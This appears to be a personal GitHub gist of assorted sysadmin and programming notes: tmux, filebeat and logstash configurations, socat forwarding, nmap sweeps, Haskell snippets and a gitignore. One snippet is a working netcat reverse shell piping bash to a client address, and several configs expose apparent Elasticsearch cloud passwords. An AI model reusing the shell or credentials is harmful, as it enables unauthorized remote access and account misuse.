Created
January 30, 2019 09:23
-
-
Save typelogic/8f2059ccf75ce79f16625cbb12026e32 to your computer and use it in GitHub Desktop.
summary
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[js object] | |
var EXAMPLE = { | |
foo: 'hello', | |
hello: 42, | |
payload: new Buffer('a'), | |
meh: { | |
b: { | |
tmp: { | |
baz: 1000 | |
} | |
}, | |
lol: 'lol' | |
} | |
} | |
--------------------------------- | |
[protobuf schema] | |
message SearchRequest { | |
required string query = 1; | |
optional int32 page_number = 2; | |
optional int32 result_per_page = 3 [default = 10]; | |
enum Corpus { | |
UNIVERSAL = 0; | |
WEB = 1; | |
IMAGES = 2; | |
LOCAL = 3; | |
NEWS = 4; | |
PRODUCTS = 5; | |
VIDEO = 6; | |
} | |
optional Corpus corpus = 4 [default = UNIVERSAL]; | |
} | |
--------------------------------- | |
[openssl tip] | |
openssl x509 -text -noout -in cert.txt | |
--------------------------------- | |
[inotify watch a folder for changes] | |
inotifywait -mr --exclude '.git' -e create somefolder/ | |
--------------------------------- | |
[yml tip] | |
pip install pyyml | |
python -c 'import sys, yaml, json; json.dump(yaml.load(sys.stdin), sys.stdout, indent=4)' < docker-compose.yml > /tmp/docker-compose.json | |
--------------------------------- | |
[Windows network adapters] | |
ncpa.cpl | |
--------------------------------- | |
[rpi alt] | |
nexx wt3020f | |
--------------------------------- | |
[rpi kali] | |
http://aircrack-ng.org/doku.php?id=compatibility_drivers | |
--------------------------------- | |
[rpi3b xpt2046 -> /etc/X11/xorg.conf.d/] | |
Section "Device" | |
# WaveShare SpotPear 3.5", framebuffer 1 | |
Identifier "uga" | |
driver "fbdev" | |
Option "fbdev" "/dev/fb1" | |
Option "ShadowFB" "off" | |
EndSection | |
Section "Monitor" | |
# Primary monitor. WaveShare SpotPear 480x320 | |
Identifier "WSSP" | |
EndSection | |
Section "Screen" | |
Identifier "primary" | |
Device "uga" | |
Monitor "WSSP" | |
EndSection | |
Section "ServerLayout" | |
Identifier "default" | |
Screen 0 "primary" 0 0 | |
EndSection | |
--------------------------------- | |
[golang url download for arm] | |
https://gist.github.com/simoncos/49463a8b781d63b5fb8a3b666e566bb5 | |
--------------------------------- | |
[dot_tmux.conf] | |
set-environment -g CHERE_INVOKING 1 | |
set -g display-panes-time 5000 | |
set-window-option -g mode-keys vi | |
bind-key -T copy-mode-vi 'v' send -X begin-selection | |
bind-key -T copy-mode-vi 'y' send -X copy-selection-and-cancel | |
set -g status-bg black | |
set -g status-fg white | |
set -g default-terminal "xterm-256color" | |
bind-key u run "tmux capture-pane \; tmux save-buffer ~/tmuxdb/captures/\"$(date +'%Y%m%dT%H%M%S')\"" \; display 'captured' | |
#bind-key a run "~/bin/tsave.sh" \; display 'saving buffers ...' | |
bind r source-file ~/.tmux.conf \; display 'reloaded' | |
#set -g visual-activity on | |
#bind-key C run "~/tmuxdb/clearbuffers.sh" \; display 'All buffers cleared' | |
bind-key R command-prompt -I '-b ' 'setb %1' | |
bind-key S command-prompt -I '-s ' 'new-session %1' | |
bind-key k command-prompt -I '-t ' 'kill-session %1' | |
bind-key A kill-session -C | |
bind-key - choose-buffer "delete-buffer -b '%%'" | |
set-option -g status-left-length 255 | |
set -g status-left '#[fg=green,bg=black,bold]#S #[fg=white,bg=colour19,bold][#{pane_current_path}]' | |
set -g status-right '#[fg=white,bg=colour19,bold] %a %d/%b #[fg=green,bg=colour8,bold] %H:%M ' | |
bind-key c new-window -c "#{pane_current_path}" | |
bind-key % split-window -h -c "#{pane_current_path}" | |
bind-key '"' split-window -v -c "#{pane_current_path}" | |
# activity window | |
setw -g monitor-activity on | |
setw -g window-status-activity-bg white | |
setw -g window-status-activity-fg red | |
set-option -g -s status-interval 1 | |
--------------------------------- | |
[nc file receiver] | |
#!/bin/sh | |
# | |
while true;do | |
f=$(nc -l 14345) | |
nc -l 14345 > /cygdrive/c/stargate/$f | |
printf "+" | |
#sleep 1 | |
find /cygdrive/c/stargate/ -type f -size 0 -exec rm {} \; | |
done | |
--------------------------------- | |
[rpi p4wnp1] | |
https://github.com/mame82/P4wnP1/blob/master/setup.cfg#L39 | |
--------------------------------- | |
[kali start ssh server] | |
systemctl start ssh.socket | |
--------------------------------- | |
[vnc tips] | |
[linux server] | |
vncserver | |
... | |
vncserver -kill :1 | |
[linux client/cygwin] | |
vncviewer ipaddr:5901 | |
--------------------------------- | |
[systemd timesyncd ntp service setting tip] | |
systemctl status systemd-timesyncd | |
echo 'NTP=time00.ncr.com' >> /etc/systemd/timesyncd.conf | |
--------------------------------- | |
[c++ map] | |
#include <list> | |
#include <functional> | |
using namespace std; | |
template <typename T, typename U> | |
list<U> map (function <U(T)> f, list<T> list) | |
{ | |
if (isEmpty (list)) | |
return empty <U>(); | |
else | |
return addToFront (f(front(list)), map (f,rest(list))); | |
} | |
--------------------------------- | |
[windows networking tips] | |
netsh interface ip show tcpconnections | |
--------------------------------- | |
[ssh md5 fingerprint] | |
ssh-keygen -E md5 -lf .ssh/authorized_keys | |
--------------------------------- | |
[reverse DNS up machines. Won't find down machines] | |
# sweep scan | |
nmap -sP 153.77.225.0/24 | |
# (@Windows) specific ip | |
nslookup 192.168.3.123 | |
tracert 192.168.3.123 | |
--------------------------------- | |
[nc file server] | |
while true;do printf "L";req=$(nc -l 1234);printf "S";nc -l 1234 < $req;done | |
--------------------------------- | |
[main.c read from stdin] | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#ifdef _WIN32 | |
#include <io.h> | |
#define read _read | |
#define fileno _fileno | |
#define STDIN_FILENO 0 | |
#else | |
#include <unistd.h> | |
#endif | |
#define BUF_SIZE 256 | |
/* Description: | |
* ./main [< line.txt] | |
*/ | |
int main(int argc, char *argv[]) | |
{ | |
char buffer[BUF_SIZE]; | |
int nread = 0,stdin_fileno = fileno(stdin); | |
printf("%d\n", argc); | |
memset(buffer, 0x00, BUF_SIZE); | |
nread = read (STDIN_FILENO, buffer, BUF_SIZE); | |
printf("[%d]\n",nread); | |
printf("[%s]", buffer); | |
return 0; | |
} | |
--------------------------------- | |
[stargate quick shell] | |
# from server side | |
mkfifo /tmp/stargate | |
while true;do cat /tmp/stargate | /bin/bash -i 2>&1 | nc $CLIENT_IPADDR 14344 > /tmp/stargate;printf ".";sleep 5;done | |
# from client side | |
nc -l 14344 | |
# Result: A shell is operative at the client side | |
--------------------------------- | |
[nspire: recursive function] | |
f(x):=when(x=0,1,x*f(x-1)) | |
--------------------------------- | |
[keyboard layout] | |
setxkbmap us -variant colemak | |
--------------------------------- | |
[this is a test] | |
hello | |
--------------------------------- | |
[filebeat indexing tips] | |
filebeat.inputs: | |
########### | |
- type: log | |
fields: | |
document_type: fromWalmart | |
paths: | |
- c:\elk\jag100\file.log | |
- c:\elk\jag100\test.dat | |
########### | |
- type: tcp | |
fields: | |
document_type: fromNetwork | |
host: "153.59.201.187:9000" | |
max_message_size: 10MiB | |
tags: ["tcp_9000"] | |
########### | |
- type: log | |
fields: | |
document_type: fromKroger | |
paths: | |
- c:\elk\kroger\apache.log | |
########### | |
- type: log | |
fields: | |
document_type: fromOthers | |
paths: | |
- c:\elk\others\* | |
- c:\elk\others\*\* | |
#output.logstash: | |
# hosts: ["192.168.3.70:5044"] | |
# hosts: ["jag-ingress.ncr.systems:5044"] | |
output.elasticsearch: | |
hosts: ["ba230b9570ccc5522.us-east-1.aws.found.io:443"] | |
protocol: "https" | |
username: "elastic" | |
password: "tspDMTT6I71d2liMRH" | |
indices: | |
- index: "from-153.59.201.187-%{+yyyy.MM.dd}" | |
when.contains: | |
message: "WARN" | |
- index: "error-%{[beat.version]}-%{+yyyy.MM.dd}" | |
when.contains: | |
message: "ERR" | |
filebeat.config.modules: | |
path: ${path.config}/modules.d/*.yml | |
reload.enabled: false | |
setup.template.settings: | |
index.number_of_shards: 3 | |
processors: | |
- add_host_metadata: ~ | |
- add_cloud_metadata: ~ | |
--------------------------------- | |
[fpython: sums list of numbers] | |
# sums a list of numbers | |
def f (p): | |
if not isinstance (p,list): | |
raise ValueError ("type error") | |
x, *xs = p | |
return x if xs == [] else x + f (xs) | |
--------------------------------- | |
[git tips: retrack] | |
git clean -fdx;sleep 1;git reset --hard HEAD | |
--------------------------------- | |
[midl small working IDL file] | |
import "unknwn.idl"; | |
[ | |
object, | |
uuid(1221db62-f3d8-11d4-825d-00104b3646c0), | |
helpstring("interface IAdd is used for implementing a super-fast addition Algorithm") | |
] | |
interface IAdd : IUnknown | |
{ | |
HRESULT SetNum1(long nX1); | |
HRESULT SetNum2(long nX2); | |
HRESULT DoAdd([out,retval] long *pBuffer); | |
}; | |
[ | |
uuid(3ff1aab8-f3d8-11d4-825d-00104b3646c0), | |
helpstring("Interfaces for algorithm implementations .") | |
] | |
library MathLib | |
{ | |
importlib("stdole32.tlb"); | |
importlib("stdole2.tlb"); | |
interface IAdd; | |
} | |
--------------------------------- | |
[midl MIDL2398: cannot execute MIDL engine] | |
https://asciinema.org/a/W2wEnv4y8nWHNWl5P3NIw8GnF | |
--------------------------------- | |
[xml tips] | |
# Get overall feel of the xml's structure | |
xml_elcount file.xml | |
# Enumerate name attribute values of class node | |
xml sel -t -v '//class/@name' file.xml | sort > /tmp/lista | |
# Show common values between two sorted lists | |
comm -12 /tmp/lista /tmp/listb | |
# Show values only in lista | |
comm -23 /tmp/lista /tmp/listb | |
# Show values only in listb | |
comm -13 /tmp/lista /tmp/listb | |
--------------------------------- | |
[lucene queries] | |
# Find all docs whose host field must not equal localhost | |
# and whose @timestamp field is greater than year 2000. | |
# Sort the result using the @timestamp field in ascending order | |
# and display only two fields: @timestamp, host | |
{ | |
"query":{ | |
"bool":{ | |
"must_not":{ | |
"term":{ "host":"localhost" } | |
}, | |
"must": { | |
"range": { | |
"@timestamp": { "gt": "2000-01-01T00:01:01.968Z" } | |
} | |
} | |
} | |
}, | |
"sort":{ | |
"@timestamp":{ "order":"asc" } | |
}, | |
"_source": ["@timestamp","host"] | |
} | |
--------------------------------- | |
[nixos: thinkfan configuration in /etc/nixos/configuration.nix] | |
# Thinkpad T440 | |
# postconditions: | |
# 1) status should be enabled: | |
# cat /proc/acpi/ibm/fan | |
# 2) No errors in systemd logs: | |
# journalctl -u thinkfan.service -f | |
services = { | |
thinkfan = { | |
enable = true; | |
sensors = '' | |
# Entries here discovered by: | |
# find /sys/devices -type f -name "temp*_input" | |
hwmon /sys/devices/platform/coretemp.0/hwmon/hwmon2/temp3_input | |
hwmon /sys/devices/platform/coretemp.0/hwmon/hwmon2/temp1_input | |
hwmon /sys/devices/platform/coretemp.0/hwmon/hwmon2/temp2_input | |
hwmon /sys/devices/virtual/hwmon/hwmon1/temp1_input | |
''; | |
levels = '' | |
(0, 0, 42) | |
(1, 40, 47) | |
(2, 45, 52) | |
(3, 50, 57) | |
(4, 55, 62) | |
(5, 60, 77) | |
(7, 73, 93) | |
(127, 85, 32767) | |
''; | |
}; | |
} | |
--------------------------------- | |
[filebeat fields] | |
filebeat.inputs: | |
- type: log | |
fields: | |
document_type: fromWalmart | |
paths: | |
- c:\elk\jag100\file.log | |
- c:\elk\jag100\test.dat | |
- type: tcp | |
fields: | |
document_type: fromNetwork | |
host: "153.59.201.187:9000" | |
max_message_size: 10MiB | |
tags: ["smeagol"] | |
- type: log | |
fields: | |
document_type: fromKroger | |
paths: | |
- c:\elk\kroger\apache.log | |
filebeat.config.modules: | |
path: ${path.config}/modules.d/*.yml | |
reload.enabled: false | |
setup.template.settings: | |
index.number_of_shards: 3 | |
setup.kibana: | |
output.logstash: | |
#hosts: ["192.168.3.69:5044","192.168.3.70:5044"] | |
#loadbalance: true | |
#worker: 3 | |
hosts: ["192.168.3.70:5044"] | |
#hosts: ["jag-ingress.ncr.systems:5044"] | |
processors: | |
- add_host_metadata: ~ | |
- add_cloud_metadata: ~ | |
--------------------------------- | |
[logstash ruby snippet] | |
require 'openssl' | |
puts OpenSSL::Cipher.ciphers | |
--------------------------------- | |
[logstash: logstash-filter-cipher algorithm] | |
AES-128-CBC | |
AES-192-CBC | |
AES-256-CBC | |
AES-128-CFB | |
AES-192-CFB | |
AES-256-CFB | |
AES-128-CFB8 | |
AES-192-CFB8 | |
AES-256-CFB8 | |
AES-128-ECB | |
AES-192-ECB | |
AES-256-ECB | |
AES-128-OFB | |
AES-192-OFB | |
AES-256-OFB | |
AES128 | |
AES192 | |
AES256 | |
BF | |
BF-CBC | |
BF-CFB | |
BF-CFB8 | |
BF-ECB | |
BF-OFB | |
CAMELLIA-128-CBC | |
CAMELLIA-192-CBC | |
CAMELLIA-256-CBC | |
CAMELLIA-128-CFB | |
CAMELLIA-192-CFB | |
CAMELLIA-256-CFB | |
CAMELLIA-128-CFB8 | |
CAMELLIA-192-CFB8 | |
CAMELLIA-256-CFB8 | |
CAMELLIA-128-ECB | |
CAMELLIA-192-ECB | |
CAMELLIA-256-ECB | |
CAMELLIA-128-OFB | |
CAMELLIA-192-OFB | |
CAMELLIA-256-OFB | |
CAMELLIA128 | |
CAMELLIA192 | |
CAMELLIA256 | |
CAST | |
CAST-CBC | |
CAST5-CBC | |
CAST5-CFB | |
CAST5-CFB8 | |
CAST5-ECB | |
CAST5-OFB | |
CAST6-CBC | |
CAST6-CFB | |
CAST6-CFB8 | |
CAST6-ECB | |
CAST6-OFB | |
DES | |
DES-CBC | |
DES-CFB | |
DES-CFB8 | |
DES-ECB | |
DES-OFB | |
DES-EDE | |
DES-EDE-CBC | |
DES-EDE-CFB | |
DES-EDE-OFB | |
DES-EDE3 | |
DES-EDE3-CBC | |
DES-EDE3-CFB | |
DES-EDE3-CFB8 | |
DES-EDE3-ECB | |
DES-EDE3-OFB | |
DES3 | |
RC2 | |
RC2-CBC | |
RC2-CFB | |
RC2-CFB8 | |
RC2-ECB | |
RC2-OFB | |
RC2-40-CBC | |
RC2-64-CBC | |
RC4 | |
RC4-40 | |
SEED | |
SEED-CBC | |
SEED-CFB | |
SEED-CFB8 | |
SEED-ECB | |
SEED-OFB | |
aes-128-cbc | |
aes-192-cbc | |
aes-256-cbc | |
aes-128-cfb | |
aes-192-cfb | |
aes-256-cfb | |
aes-128-cfb8 | |
aes-192-cfb8 | |
aes-256-cfb8 | |
aes-128-ecb | |
aes-192-ecb | |
aes-256-ecb | |
aes-128-ofb | |
aes-192-ofb | |
aes-256-ofb | |
aes128 | |
aes192 | |
aes256 | |
bf | |
bf-cbc | |
bf-cfb | |
bf-cfb8 | |
bf-ecb | |
bf-ofb | |
camellia-128-cbc | |
camellia-192-cbc | |
camellia-256-cbc | |
camellia-128-cfb | |
camellia-192-cfb | |
camellia-256-cfb | |
camellia-128-cfb8 | |
camellia-192-cfb8 | |
camellia-256-cfb8 | |
camellia-128-ecb | |
camellia-192-ecb | |
camellia-256-ecb | |
camellia-128-ofb | |
camellia-192-ofb | |
camellia-256-ofb | |
camellia128 | |
camellia192 | |
camellia256 | |
cast | |
cast-cbc | |
cast5-cbc | |
cast5-cfb | |
cast5-cfb8 | |
cast5-ecb | |
cast5-ofb | |
cast6-cbc | |
cast6-cfb | |
cast6-cfb8 | |
cast6-ecb | |
cast6-ofb | |
des | |
des-cbc | |
des-cfb | |
des-cfb8 | |
des-ecb | |
des-ofb | |
des-ede | |
des-ede-cbc | |
des-ede-cfb | |
des-ede-ofb | |
des-ede3 | |
des-ede3-cbc | |
des-ede3-cfb | |
des-ede3-cfb8 | |
des-ede3-ecb | |
des-ede3-ofb | |
des3 | |
rc2 | |
rc2-cbc | |
rc2-cfb | |
rc2-cfb8 | |
rc2-ecb | |
rc2-ofb | |
rc2-40-cbc | |
rc2-64-cbc | |
rc4 | |
rc4-40 | |
seed | |
seed-cbc | |
seed-cfb | |
seed-cfb8 | |
seed-ecb | |
seed-ofb | |
--------------------------------- | |
[networx: udp server that forwards to tcp server] | |
socat UDP-LISTEN:2222,reuseaddr,fork TCP:localhost:1111 | |
--------------------------------- | |
[networx: tcp server that forwards to udp server] | |
socat TCP-LISTEN:2222,reuseaddr,fork UDP:localhost:1111 | |
--------------------------------- | |
[networx: tcp forver running server at port 1111] | |
socat - TCP-LISTEN:1111,reuseaddr,fork | |
--------------------------------- | |
[networx: udp forver running server at port 1111] | |
socat - UDP-LISTEN:1111,reuseaddr,fork | |
--------------------------------- | |
[jagdown logstash.conf] | |
input { | |
beats { | |
port => 5044 | |
} | |
tcp { | |
port => 14344 | |
} | |
} | |
filter { | |
# https://discuss.elastic.co/t/logstash-errors-after-upgrading-to-filebeat-6-3-0/135984/6 | |
mutate { | |
remove_field => [ "[host][name]" ] | |
remove_field => [ "[host][id]" ] | |
remove_field => [ "[host][architecture]" ] | |
remove_field => [ "[host][os][platform]" ] | |
remove_field => [ "[host][os][version]" ] | |
remove_field => [ "[host][os][family]" ] | |
remove_field => [ "[host][ip]" ] | |
remove_field => [ "[host][mac]" ] | |
remove_field => [ "[host][os]" ] | |
remove_field => [ "[host]" ] | |
} | |
mutate { | |
add_field => { | |
"host" => "%{[beat][hostname]}" | |
} | |
} | |
# my test stuff | |
if ([source]) { | |
mutate { | |
add_field => { "logfile" => "%{source}" } | |
} | |
} else { | |
mutate { | |
add_field => { | |
"logfile" => "" | |
"comment" => "not from logfile" | |
} | |
} | |
} | |
} | |
output { | |
stdout { | |
codec => rubydebug | |
} | |
#elasticsearch { | |
# hosts => ["${ESURL}"] | |
# user => "${ESUSER}" | |
# password => "${ESPASS}" | |
# index => "jagdown-%{+YYYY.MM.dd}" | |
#} | |
#file { | |
# path => "/tmp/rx.log" | |
# codec => line { format => "rx: %{message}" } | |
#} | |
elasticsearch { | |
hosts => "elastic-local-node:9200" | |
manage_template => false | |
index => "jagdown-%{+YYYY.MM.dd}" | |
} | |
gelf { | |
host => "localhost" | |
port => 12201 | |
protocol => "UDP" | |
} | |
} | |
--------------------------------- | |
[docker tips] | |
docker run -d --name=jag_logstash -v /area51/:/area51/ -v /area51/config/filebeat.yml:/usr/share/filebeat/filebeat.yml -v /area51/filebeat/data/:/usr/share/f | |
ilebeat/data/ -v /area51/filebeat/logs/:/usr/share/filebeat/logs/ docker.elastic.co/beats/filebeat:6.5.1 | |
filebeat.config: | |
prospectors: | |
path: ${path.config}/prospectors.d/*.yml | |
reload.enabled: false | |
modules: | |
path: ${path.config}/modules.d/*.yml | |
reload.enabled: false | |
processors: | |
- add_cloud_metadata: | |
filebeat.inputs: | |
- type: log | |
enabled: true | |
paths: | |
- /shared/support/* | |
- /shared/support/*/* | |
#- c:\programdata\elasticsearch\logs\* | |
#filebeat.inputs: | |
# - type: udp | |
# host: "172.17.0.3:14344" | |
#setup.template.name: "filebeat" | |
#setup.template.pattern: "filebeat-*" | |
# | |
#output.elasticsearch: | |
# hosts: ['https://eb756457ba230b9570ccc5522.us-east-1.aws.found.io:9243'] | |
# username: "elastic" | |
# password: "UtspDMTT6I71d2liMRH" | |
# index: "jagdown-%{+yyyy.MM.dd}" | |
output.logstash: | |
hosts: ["172.17.0.2:5044"] | |
--------------------------------- | |
[elasticsearch logstash-output-gelf custom field] | |
input { | |
beats { | |
port => 5044 | |
} | |
tcp { | |
port => 14344 | |
} | |
#exec { | |
# command => "date > /tmp/date.log" | |
# interval => 10 | |
#} | |
#file { | |
# path => ["/tmp/date.log"] | |
#} | |
#file { | |
# path => ["/logdir/*"] | |
# mode => "read" | |
#} | |
} | |
filter { | |
# temp fix https://discuss.elastic.co/t/logstash-errors-after-upgrading-to-filebeat-6-3-0/135984/6 | |
mutate { | |
remove_field => [ "[host]" ] | |
} | |
mutate { | |
add_field => { | |
"host" => "%{[beat][hostname]}" | |
} | |
} | |
if ([source]) { | |
mutate { | |
add_field => { "logfile" => "%{source}" } | |
} | |
} else { | |
mutate { | |
add_field => { | |
"logfile" => "" | |
"comment" => "not from logfile" | |
} | |
} | |
} | |
} | |
output { | |
stdout { | |
codec => rubydebug | |
} | |
elasticsearch { | |
hosts => ["https://6bd430aceb756457ba230b9570ccc55229.us-east-1.aws.found.io:443"] | |
#protocol: "https" | |
user => "elastic" | |
password => "3oq01hUtspDMTT6I71d2liMRH141" | |
index => "jagdown-%{+YYYY.MM.dd}" | |
} | |
# "UDP" is default | |
gelf { | |
host => "192.168.3.69" | |
port => 12201 | |
protocol => "TCP" | |
#ship_metadata => true | |
#custom_fields => {"aaa" => "%{logfile}"} | |
#ignore_metadata => [] | |
} | |
#file { | |
# path => "/tmp/rx.log" | |
# codec => line { format => "foo: %{source}" } | |
#} | |
#udp { | |
# #mode => "client" | |
# host => "192.168.2.234" | |
# port => 161 | |
#} | |
} | |
--------------------------------- | |
[create 1024 bytes of random binary data] | |
dd if=/dev/urandom of=file.dat bs=1 count=1024 | |
--------------------------------- | |
[jq tips search match array] | |
# select the array element whose offset is 0 | |
jq '.hits.hits[] | select(._source.offset==0)' input.json | |
# sorting the array from oldest to newest based on @timestamp field | |
jq '.hits.hits |= sort_by(._source."@timestamp")' input.json | |
# get docs sorted by @timestamp field from oldest to newest | |
curl -s -H 'content-type:application/json' -XGET "$ESURL/winlogbeat-*/_search?pretty" -d'{"sort":[{"@timestamp":{"order":"asc"}}],"query":{"match_all":{}}}' | |
--------------------------------- | |
[elasticsearch: logstash temp fix] | |
input { | |
beats { | |
port => 5044 | |
} | |
tcp { | |
port => 14344 | |
} | |
#exec { | |
# command => "date > /tmp/date.log" | |
# interval => 10 | |
#} | |
#file { | |
# path => ["/tmp/date.log"] | |
#} | |
#file { | |
# path => ["/logdir/*"] | |
# mode => "read" | |
#} | |
} | |
filter { | |
# temp fix https://discuss.elastic.co/t/logstash-errors-after-upgrading-to-filebeat-6-3-0/135984/6 | |
mutate { | |
remove_field => [ "[host]" ] | |
} | |
mutate { | |
add_field => { | |
"host" => "%{[beat][hostname]}" | |
} | |
} | |
} | |
output { | |
stdout { | |
codec => rubydebug | |
} | |
elasticsearch { | |
hosts => ["https://us-east-1.aws.found.io:9243"] | |
#protocol: "https" | |
user => "elastic" | |
password => "T6I71d2liMRH" | |
index => "jagdown-%{+YYYY.MM.dd}" | |
} | |
# "UDP" is default | |
gelf { | |
host => "172.17.0.6" | |
port => 12201 | |
protocol => "TCP" | |
} | |
#udp { | |
# #mode => "client" | |
# host => "192.168.2.234" | |
# port => 161 | |
#} | |
} | |
--------------------------------- | |
[elasticsearch: logstash.conf] | |
input { | |
beats { | |
port => 5044 | |
} | |
tcp { | |
port => 14344 | |
} | |
#exec { | |
# command => "date > /tmp/date.log" | |
# interval => 10 | |
#} | |
#file { | |
# path => ["/tmp/date.log"] | |
#} | |
#file { | |
# path => ["/logdir/*"] | |
# mode => "read" | |
#} | |
} | |
output { | |
stdout { | |
codec => rubydebug | |
} | |
elasticsearch { | |
hosts => ["https://us-east-1.aws.found.io:9243"] | |
#protocol: "https" | |
user => "elastic" | |
password => "T6I71d2liMRH" | |
index => "jagdown-%{+YYYY.MM.dd}" | |
} | |
#udp { | |
# #mode => "client" | |
# host => "192.168.2.234" | |
# port => 161 | |
#} | |
} | |
--------------------------------- | |
[elasticsearch: filebeat.yml] | |
filebeat.config: | |
prospectors: | |
path: ${path.config}/prospectors.d/*.yml | |
reload.enabled: false | |
modules: | |
path: ${path.config}/modules.d/*.yml | |
reload.enabled: false | |
processors: | |
- add_cloud_metadata: | |
filebeat.inputs: | |
- type: log | |
enabled: true | |
paths: | |
- /logdir/* | |
#- c:\programdata\elasticsearch\logs\* | |
#filebeat.inputs: | |
# - type: udp | |
# host: "172.17.0.3:14344" | |
#setup.template.name: "filebeat" | |
#setup.template.pattern: "filebeat-*" | |
# | |
#output.elasticsearch: | |
# hosts: ['https://5522.us-east-1.aws.found.io:9243'] | |
# username: "elastic" | |
# password: "DMTT6I71d2liMRH" | |
# index: "jagdown-%{+yyyy.MM.dd}" | |
output.logstash: | |
hosts: ["172.17.0.2:5044"] | |
--------------------------------- | |
[elasticsearch: search pattern and count] | |
#!/bin/sh | |
# | |
index="$1" | |
mkdir -p /tmp/fk/query/ | |
curl -s -H 'content-type:application/json' -XGET \ | |
"$ESURL/$index/_search?pretty" \ | |
-d '{"query":{"match":{"source":"/logdir/eventfile_0000000090.jag.zip.base64"}}}' > /tmp/fk/query/0.json | |
count=$(jq '.hits.total' /tmp/fk/query/0.json) | |
if [ -z "$count" ];then | |
echo "Index not found" | |
exit 1 | |
fi | |
echo "Downloading $count documents ..." | |
sleep 3 | |
for((i=1;i<count;i=i+10));do | |
curl -s -H 'content-type:application/json' -XGET \ | |
"$ESURL/$index/_search?pretty" \ | |
-d '{"query":{"match":{"source":"/logdir/eventfile_0000000090.jag.zip.base64"}}}' > /tmp/fk/query/$i.json | |
done | |
--------------------------------- | |
[elasticsearch _search] | |
#!/bin/sh | |
# | |
index="$1" | |
s=$(curl -s -XGET "$ESURL/_cat/indices?v" | grep -w $index) | |
count=$(echo $s | cut -d' ' -f7) | |
mkdir -p /tmp/fk/$index | |
if [ -z "$count" ];then | |
echo "Index not found" | |
exit 1 | |
fi | |
echo "Downloading $count documents ..." | |
sleep 3 | |
for((i=0;i<count;i=i+10));do | |
curl -s -H 'content-type:application/json' -XGET \ | |
"$ESURL/$index/_search?from=$i&pretty" \ | |
| tee /tmp/fk/$index/$i.json | |
done | |
--------------------------------- | |
[networking: scripting wpa_cli] | |
#!/bin/sh | |
# | |
[ $# -lt 3 ] && exit 1 | |
interface=$1 | |
ssid=\"$2\" | |
psk=\"$3\" # does not work. how? | |
netid=$(wpa_cli -i $interface add_network) | |
wpa_cli -i $interface set_network $netid ssid $ssid | |
wpa_cli -i $interface set_network $netid psk '"12345678"' | |
wpa_cli -i $interface select_network $netid | |
--------------------------------- | |
[networking: wpa_cli finally nailed down while in boracay] | |
https://asciinema.org/a/b2R3Z62PzNweVyENDaHQIWNtU | |
--------------------------------- | |
[c/c++ include headers] | |
include: | |
c: | |
memcpy,memset: string.h | |
lseek: [sys/types.h,unistd.h] | |
printf: stdio.h | |
realloc: stdlib.h | |
assert: assert.h | |
exit: stdlib.h | |
c++: | |
cout: iostream | |
--------------------------------- | |
[elasticsearch working filebeat.yml] | |
filebeat.inputs: | |
- type: log | |
enabled: true | |
paths: | |
- c:\testlog\test.log | |
- c:\testlog\logdir\* | |
filebeat.config.modules: | |
path: ${path.config}/modules.d/*.yml | |
reload.enabled: false | |
setup.template.settings: | |
index.number_of_shards: 3 | |
setup.kibana: | |
output.elasticsearch: | |
hosts: ["abcdefghijklmnopqrstuvwxyz.us-east-1.aws.found.io:443"] | |
protocol: "https" | |
username: "elastic" | |
password: "oaeuousnthtHXXeueou" | |
processors: | |
- add_host_metadata: ~ | |
- add_cloud_metadata: ~ | |
--------------------------------- | |
[elasticsearch basics] | |
curl -H 'content-type:application/json' -XGET 'https://username:[email protected]/pornindex/_search?pretty' -d '{"query":{"match_all":{}}}' | |
curl -XGET 'https://username:[email protected]/_cat?v&pretty' | |
--------------------------------- | |
[haskell tuple eq with don't care] | |
-- because cannot do it as: | |
-- (3,_) == (3,_) | |
(a,_) === (b,_) = a == b | |
--------------------------------- | |
[vim auto-indent] | |
filetype plugin indent on | |
" show existing tab with 4 spaces width | |
set tabstop=4 | |
" when indenting with '>', use 4 spaces width | |
set shiftwidth=4 | |
" On pressing tab, insert 4 spaces | |
set expandtab | |
--------------------------------- | |
[my haskell solution to aaron] | |
-- https://codereview.stackexchange.com/questions/207929/determining-whether-x-y-points-in-the-input-constitute-a-function/207944#207944 | |
main = undefined | |
input = [(0,1),(5,26),(3,9),(4,16),(5,25),(3,9),(7,49)] | |
isFuncPoint (p,q) ((a,b):xs) | (p,q) == (a,b) = True | |
| p == a = False | |
| null xs = True | |
| otherwise = isFuncPoint (p,q) xs | |
compute arr = foldr (\e acc -> e `isFuncPoint` arr:acc) [] arr | |
--------------------------------- | |
[haskell bubble sort. Scratching my way up to the ivory tower haha] | |
-- second evolution | |
main = undefined | |
doit [] = [] | |
doit [x] = [x] | |
doit (x:xs) | x > head xs = head xs:doit (x:tail xs) | |
| otherwise = x:doit xs | |
bsort xs = foldl (\acc e -> doit acc) xs xs | |
--------------------------------- | |
[awk tip by enzotib] | |
awk -F'[ :]*' '/Bcast/ { print $6 }' | |
--------------------------------- | |
[git gitignore tip] | |
* | |
!.gitignore | |
--------------------------------- | |
[vstudio gitignore] | |
## Ignore Visual Studio temporary files, build results, and | |
## files generated by popular Visual Studio add-ons. | |
## | |
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore | |
# User-specific files | |
*.rsuser | |
*.suo | |
*.user | |
*.userosscache | |
*.sln.docstates | |
# User-specific files (MonoDevelop/Xamarin Studio) | |
*.userprefs | |
# Build results | |
[Dd]ebug/ | |
[Dd]ebugPublic/ | |
[Rr]elease/ | |
[Rr]eleases/ | |
x64/ | |
x86/ | |
bld/ | |
[Bb]in/ | |
[Oo]bj/ | |
[Ll]og/ | |
# Visual Studio 2015/2017 cache/options directory | |
.vs/ | |
# Uncomment if you have tasks that create the project's static files in wwwroot | |
#wwwroot/ | |
# Visual Studio 2017 auto generated files | |
Generated\ Files/ | |
# MSTest test Results | |
[Tt]est[Rr]esult*/ | |
[Bb]uild[Ll]og.* | |
# NUNIT | |
*.VisualState.xml | |
TestResult.xml | |
# Build Results of an ATL Project | |
[Dd]ebugPS/ | |
[Rr]eleasePS/ | |
dlldata.c | |
# Benchmark Results | |
BenchmarkDotNet.Artifacts/ | |
# .NET Core | |
project.lock.json | |
project.fragment.lock.json | |
artifacts/ | |
# StyleCop | |
StyleCopReport.xml | |
# Files built by Visual Studio | |
*_i.c | |
*_p.c | |
*_h.h | |
*.ilk | |
*.meta | |
*.obj | |
*.iobj | |
*.pch | |
*.pdb | |
*.ipdb | |
